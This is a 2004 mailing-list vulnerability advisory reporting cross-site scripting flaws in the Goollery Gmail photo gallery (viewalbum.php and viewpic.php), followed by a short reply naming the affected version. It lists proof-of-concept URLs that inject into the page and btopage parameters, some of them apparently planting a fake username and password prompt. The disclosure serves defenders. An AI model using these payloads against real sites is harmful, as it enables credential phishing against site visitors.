From: Lostmon Date: Sun, 31 Oct 2004 23:58:53 +0100 #################################################### #XSS iN Goollery Gmail script for view Photo Galery # # os-win 2000 sp4 Ie 6.x All fixes # #Vendor URL: http://www.wirzm.ch/goollery/about/about.php### #################################################### Goollery is a GMail based photo gallery. You can upload pictures from a website. The pictures will automatically be stored in your gmail accout. some security flaws lets malicios users to This is just a proof on concept! ################################### #File viewalbun.php and viewpic.php XSS vunerability:# ################################### http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=[XSS-CODE]&sess=daf5c642ade1162f15c4eb4b7e89da17 http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=XSS%20poW@!!&sess=daf5c642ade1162f15c4eb4b7e89da17 http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=Username:
Password:
&sess=daf5c642ade1162f15c4eb4b7e89da17 http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=XSS%20poW@!!&sess=daf5c642ade1162f15c4eb4b7e89da17 http://[TARGET]/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a&btopage=Username:
Password:
http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=XSS%20poW@!!&sess=daf5c642ade1162f15c4eb4b7e89da17 Atentamente: Lostmon (Lostmon(at)Gmail.com) Thnx to www.Ayuda-Internet.net for their support Thnx to Estrella to be my ligth Ipy :***** -- La curiosidad es lo que hace mover la mente.... ================================================================ From: Lostmon Date: Mon, 1 Nov 2004 00:38:05 +0100 hiz Yes [this affects] version 0.03 http://www.wirzm.ch/goollery/main.php here is a demo for test